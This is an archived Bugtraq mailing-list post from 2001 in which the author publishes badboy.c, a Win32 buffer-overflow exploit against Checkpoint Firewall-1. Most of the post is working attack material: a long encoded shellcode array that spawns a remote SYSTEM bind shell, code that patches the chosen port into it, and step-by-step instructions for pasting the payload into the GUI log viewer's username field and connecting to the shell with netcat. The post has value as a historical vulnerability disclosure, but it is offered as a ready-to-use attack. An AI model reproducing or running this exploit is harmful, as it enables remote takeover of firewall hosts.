Firewall-1 remote SYSTEM shell buffer overflow

From: Indigo (indig0@talk21.com)
Date: 11/28/01

Previous message: Roman Drahtmueller: "SuSE Security Announcement: wuftpd (SuSE-SA:2001:043)"
Next in thread: Scott Walker Register: "Fw: Firewall-1 remote SYSTEM shell buffer overflow"
Reply: Scott Walker Register: "Fw: Firewall-1 remote SYSTEM shell buffer overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: 28 Nov 2001 20:08:14 -0000
Message-ID: <20011128200814.10070.qmail@mail.securityfocus.com>
From: Indigo <indig0@talk21.com>
To: bugtraq@securityfocus.com
Subject: Firewall-1 remote SYSTEM shell buffer overflow

('binary' encoding is not supported, stored as-is) Mailer: SecurityFocus

As you can see I've got a few weeks free between
jobs to write some overflows!

Here's badboy.c the overflow for Checkpoint Firewall-
1

NB The overflow only works if you launch the attack
from a valid GUI client machine i.e. your IP address
must be present in the target firewall's
$FWDIR/conf/gui-clients file.

Cheers

Indigo

/* badboy.c - Win32 Checkpoint Firewall-1
overflow exploit by Indigo <indig0@talk21.com> 2001

        Usage: badboy <victim port>

        The shellcode spawns a shell on the
chosen port

        Main shellcode adapted from code written
by izan@deepzone.org

        Greets to:

        Morphsta, Br00t, Macavity, Jacob &
Monkfish...Not forgetting D-Niderlunds
*/

#include <windows.h>
#include <stdio.h>

int main(int argc, char **argv)
{

unsigned char shellcode[] =

                        "\x90\x90\x90\x90\x90
\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90
\xCC\x2B\x16\xEA\x77\x90\x90\xEB\x05\x4A\xD5"
                        "\xEC\x77\x90\x90\x90
\x90\x90\x66\x81\xE9\x5B\x29\x31\xDB\xB8\x99"
                        "\x99\x99\x99\x31\x01
\x83\xC1\x04\x83\xC3\x04\x66\x81\xFB\xC0\x04"
                        "\x7E\xF1\x66\x81\xE9
\x4E\x01\x31\xC0\x40\x29\x01\x90\x90\x90\x71"
                        "\x99\x99\x99\x99\xC4
\x18\x74\x40\xB8\xD9\x99\x14\x2C\x6B\xBD\xD9"
                        "\x99\x14\x24\x63
\xBD\xD9\x99\xF3\x9E\x09\x09\x09\x09\xC0\x71\x4B"
                        "\x9B\x99\x99\x14
\x2C\xB3\xBC\xD9\x99\x14\x24\xAA\xBC\xD9\x99
\xF3"
                        "\x93\x09\x09\x09\x09
\xC0\x71\x23\x9B\x99\x99\xF3\x99\x14\x2C\x40"
                        "\xBC\xD9\x99\xCF\x14
\x2C\x7C\xBC\xD9\x99\xCF\x14\x2C\x70\xBC\xD9"
                        "\x99\xCF\x66
\x0C\xAA\xBC\xD9\x99\xF3\x99\x14\x2C\x40\xBC\xD9
\x99"
                        "\xCF\x14\x2C\x74
\xBC\xD9\x99\xCF\x14\x2C\x68\xBC\xD9\x99
\xCF\x66"
                        "\x0C\xAA\xBC\xD9\x99
\x5E\x1C\x6C\xBC\xD9\x99\xDD\x99\x99\x99\x14"
                        "\x2C\x6C\xBC\xD9\x99
\xCF\x66\x0C\xAE\xBC\xD9\x99\x14\x2C\xB4\xBF"
                        "\xD9\x99\x34\xC9\x66
\x0C\xCA\xBC\xD9\x99\x14\x2C\xA8\xBF\xD9\x99"
                        "\x34\xC9\x66
\x0C\xCA\xBC\xD9\x99\x14\x2C\x68\xBC\xD9\x99\x14
\x24"
                        "\xB4\xBF\xD9\x99
\x3C\x14\x2C\x7C\xBC\xD9\x99\x34\x14\x24\xA8\xBF"
                        "\xD9\x99\x32\x14\x24
\xAC\xBF\xD9\x99\x32\x5E\x1C\xBC\xBF\xD9\x99"
                        "\x99\x99\x99\x99
\x5E\x1C\xB8\xBF\xD9\x99\x98\x98\x99\x99\x14\x2C"
                        "\xA0\xBF\xD9\x99
\xCF\x14\x2C\x6C\xBC\xD9\x99\xCF\xF3\x99\xF3
\x99"
                        "\xF3\x89\xF3\x98\xF3
\x99\xF3\x99\x14\x2C\xD0\xBF\xD9\x99\xCF\xF3"
                        "\x99\x66\x0C\xA2
\xBC\xD9\x99\xF1\x99\xB9\x99\x99\x09\xF1\x99\x9B"
                        "\x99\x99\x66
\x0C\xDA\xBC\xD9\x99\x10\x1C\xC8\xBF\xD9\x99
\xAA\x59"
                        "\xC9\xD9\xC9\xD9\xC9
\x66\x0C\x63\xBD\xD9\x99\xC9\xC2\xF3\x89\x14"
                        "\x2C\x50\xBC\xD9\x99
\xCF\xCA\x66\x0C\x67\xBD\xD9\x99\xF3\x9A\xCA"
                        "\x66\x0C\x9B\xBC\xD9
\x99\x14\x2C\xCC\xBF\xD9\x99\xCF\x14\x2C\x50"
                        "\xBC\xD9\x99
\xCF\xCA\x66\x0C\x9F\xBC\xD9\x99\x14\x24\xC0
\xBF\xD9"
                        "\x99\x32\xAA\x59\xC9
\x14\x24\xFC\xBF\xD9\x99\xCE\xC9\xC9\xC9\x14"
                        "\x2C\x70\xBC\xD9\x99
\x34\xC9\x66\x0C\xA6\xBC\xD9\x99\xF3\xA9\x66"
                        "\x0C\xD6\xBC\xD9\x99
\x72\xD4\x09\x09\x09\xAA\x59\xC9\x14\x24\xFC"
                        "\xBF\xD9\x99\xCE\xC9
\xC9\xC9\x14\x2C\x70\xBC\xD9\x99\x34\xC9\x66"
                        "\x0C\xA6\xBC\xD9\x99
\xF3\xA9\x66\x0C\xD6\xBC\xD9\x99\x1A\x24\xFC"
                        "\xBF\xD9\x99\x9B\x96
\x1B\x8E\x98\x99\x99\x18\x24\xFC\xBF\xD9\x99"
                        "\x98\xB9\x99\x99
\xEB\x97\x09\x09\x09\x09\x5E\x1C\xFC\xBF\xD9\x99"
                        "\x99\xB9\x99\x99\xF3
\x99\x12\x1C\xFC\xBF\xD9\x99\x14\x24\xFC\xBF"
                        "\xD9\x99\xCE\xC9\x12
\x1C\xC8\xBF\xD9\x99\xC9\x14\x2C\x70\xBC\xD9"
                        "\x99\x34\xC9\x66
\x0C\xDE\xBC\xD9\x99\xF3\xA9\x66\x0C\xD6
\xBC\xD9"
                        "\x99\x12
\x1C\xFC\xBF\xD9\x99\xF3\x99\xC9\x14\x2C\xC8
\xBF\xD9\x99"
                        "\x34\xC9\x14\x2C\xC0
\xBF\xD9\x99\x34\xC9\x66\x0C\x93\xBC\xD9\x99"
                        "\xF3\x99\x14\x24
\xFC\xBF\xD9\x99\xCE\xF3\x99\xF3\x99\xF3\x99\x14"
                        "\x2C\x70\xBC\xD9\x99
\x34\xC9\x66\x0C\xA6\xBC\xD9\x99\xF3\xA9\x66"
                        "\x0C\xD6\xBC\xD9\x99
\xAA\x50\xA0\x14\xFC\xBF\xD9\x99\x96\x1E\xFE"
                        "\x66\x66\x66\xF3\x99
\xF1\x99\xB9\x99\x99\x09\x14\x2C\xC8\xBF\xD9"
                        "\x99\x34\xC9\x14
\x2C\xC0\xBF\xD9\x99\x34\xC9\x66\x0C\x97
\xBC\xD9"
                        "\x99\x10\x1C\xF8
\xBF\xD9\x99\xF3\x99\x14\x24\xFC\xBF\xD9\x99
\xCE"
                        "\xC9\x14\x2C\xC8
\xBF\xD9\x99\x34\xC9\x14\x2C\x74\xBC\xD9\x99\x34"
                        "\xC9\x66\x0C\xD2
\xBC\xD9\x99\xF3\xA9\x66\x0C\xD6\xBC\xD9\x99
\xF3"
                        "\x99\x12\x1C\xF8
\xBF\xD9\x99\x14\x24\xFC\xBF\xD9\x99\xCE\xC9
\x12"
                        "\x1C\xC8\xBF\xD9\x99
\xC9\x14\x2C\x70\xBC\xD9\x99\x34\xC9\x66\x0C"
                        "\xDE\xBC\xD9\x99\xF3
\xA9\x66\x0C\xD6\xBC\xD9\x99\x70\x20\x67\x66"
                        "\x66\x14\x2C\xC0
\xBF\xD9\x99\x34\xC9\x66\x0C\x8B\xBC\xD9\x99
\x14"
                        "\x2C\xC4\xBF\xD9\x99
\x34\xC9\x66\x0C\x8B\xBC\xD9\x99\xF3\x99\x66"
                        "\x0C\xCE\xBC\xD9\x99
\xC8\xCF\xF1\xED\xDC\x16\x99\x09\xC3\x66\x8B"
                        "\xC9\xC2\xC0\xCE\xC7
\xC8\xCF\xCA\xF1\xE1\xDC\x16\x99\x09\xC3\x66"
                        "\x8B\xC9\x35\x1D\x59
\xEC\x62\xC1\x32\xC0\x7B\x70\x5A\xCE\xCA\xD6"
                        "\xDA\xD2\xAA\xAB\x99
\xEA\xF6\xFA\xF2\xFC\xED\x99\xFB\xF0\xF7\xFD"
                        "\x99\xF5\xF0
\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9
\xED\x99\xEA"
                        "\xFC\xF7\xFD\x99
\xEB\xFC\xFA\xEF\x99\xFA\xF5\xF6
\xEA\xFC\xEA\xF6"
                        "\xFA\xF2\xFC\xED\x99
\xD2\xDC\xCB\xD7\xDC\xD5\xAA\xAB\x99\xDA\xEB"
                        "\xFC\xF8\xED\xFC\xC9
\xF0\xE9\xFC\x99\xDE\xFC\xED\xCA\xED\xF8\xEB"
                        "\xED\xEC\xE9\xD0\xF7
\xFE\xF6\xD8\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9"
                        "\xEB\xF6
\xFA\xFC\xEA\xEA\xD8\x99\xC9\xFC\xFC\xF2\xD7
\xF8\xF4\xFC"
                        "\xFD\xC9\xF0\xE9
\xFC\x99\xDE\xF5\xF6\xFB\xF8\xF5\xD8\xF5\xF5
\xF6"
                        "\xFA\x99\xCB\xFC\xF8
\xFD\xDF\xF0\xF5\xFC\x99\xCE\xEB\xF0\xED\xFC"
                        "\xDF\xF0\xF5\xFC\x99
\xCA\xF5\xFC\xFC\xE9\x99\xDA\xF5\xF6\xEA\xFC"
                        "\xD1\xF8\xF7\xFD\xF5
\xFC\x99\xDC\xE1\xF0\xED\xC9\xEB\xF6\xFA\xFC"
                        "\xEA\xEA\x99\xDA\xF6
\xFD\xFC\xFD\xB9\xFB\xE0\xB9\xE5\xC3\xF8\xF7"
                        "\xB9\xA5\xF0\xE3\xF8
\xF7\xD9\xFD\xFC\xFC\xE9\xE3\xF6\xF7\xFC\xB7"
                        "\xF6\xEB\xFE\xA7
\x9B\x99\x86\xD1\x99\x99\x99\x99\x99\x99\x99\x99"
                        "\x99\x99\x99\x99\x95
\x99\x99\x99\x99\x99\x99\x99\x98\x99\x99\x99"
                        "\x99\x99\x99\x99\x99
\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
                        "\x99\x99\x99\x99\x99
\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
                        "\x99\x99\x99\x99\x99
\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
                        "\x99\x99\x99\x99\x99
\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
                        "\x99\x99\x99\x99\x99
\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
                        "\x99\x99\x99\x99\x99
\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
                        "\x99\x99\x99\x99
\xDA\xD4\xDD\xB7\xDC\xC1\xDC\x99\x99\x99\x99
\x99"
                        "\x89\x99\x99\x99\x99
\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
                        "\x99\x99\x99\x99\x90
\x90\x90\x90\x90\x00";



FILE *fp;
unsigned short int a_port;

printf ("\nFirewall-1 buffer overflow launcher\nby
Indigo <indig0@talk21.com> 2001\n\n");
printf ("To perform this exploit you must attack from a
valid GUI client machine\n");
printf ("i.e. your IP address must be contained in the
$FWDIR/conf/gui-clients file\n");
printf ("This program will create a binary file called
exploit.bin\n");
printf ("First open the Firewall-1 GUI log viewer
program then enter\nthe victim IP address in the
Management Server field\n");
printf ("and a few random characters in the password
field,\n");
printf ("open badboy.bin in notepad, highlight it all then
copy it to the clipboard.\n");
printf ("Paste it into the User Name field of the GUI log
viewer then click OK.\n\n");
printf ("Launch netcat: nc <victim host> <victim
port>\n");
printf ("\nThe exploit spawns a SYSTEM shell on the
chosen port\n\n");

if (argc != 2)
{
        printf ("Usage: %s <victim port>\n", argv[0]);
        exit (0);
}

a_port = htons(atoi(argv[1]));
a_port^= 0x9999;

shellcode[1567]= (a_port) & 0xff;
shellcode[1568]= (a_port >> 8) & 0xff;

fp = fopen ("./exploit.bin","wb");

fputs (shellcode,fp);

fclose (fp);

return 0;

}

Previous message: Roman Drahtmueller: "SuSE Security Announcement: wuftpd (SuSE-SA:2001:043)"
Next in thread: Scott Walker Register: "Fw: Firewall-1 remote SYSTEM shell buffer overflow"
Reply: Scott Walker Register: "Fw: Firewall-1 remote SYSTEM shell buffer overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

Re: A question about taking the absolute value of an integer
... could cause a possible overflow. ... nearly every machine nowadays) and evaluate abs. ... of undefined behavior (one for the overflow, ... argument mismatch in printf) always produce a correct result? ...
(comp.lang.c)
Re: "Sorting" assignment
... Clive D. W. Feather said: ... printf len); ... couldn't overflow or output the wrong value. ...
(comp.programming)
Re: Linux Security
... I've tried the method pushing the values on the stack and then calling ... The assembler code compiles and runs, ... buffer overflow, it doesn't segmentation fault, but it doesn't do anything. ... Does anyone know if it is possible to do a printf style command in a ...
(comp.os.linux.security)
Re: The power that is C++
... For C's printf() the widths are minimums, such that the field will expand for larger numbers. ... Also, I have wondered about f format on Cray machines with 16 bit exponents in their floating point data, including possible buffer overflow for sprintf ...
(comp.lang.fortran)
IIS Server Side Include Buffer overflow exploit code
... IIS Server Side Include Buffer overflow exploit code ... write access to the web root of the ... printf ("To exploit this vulnerability you must have ...
(Bugtraq)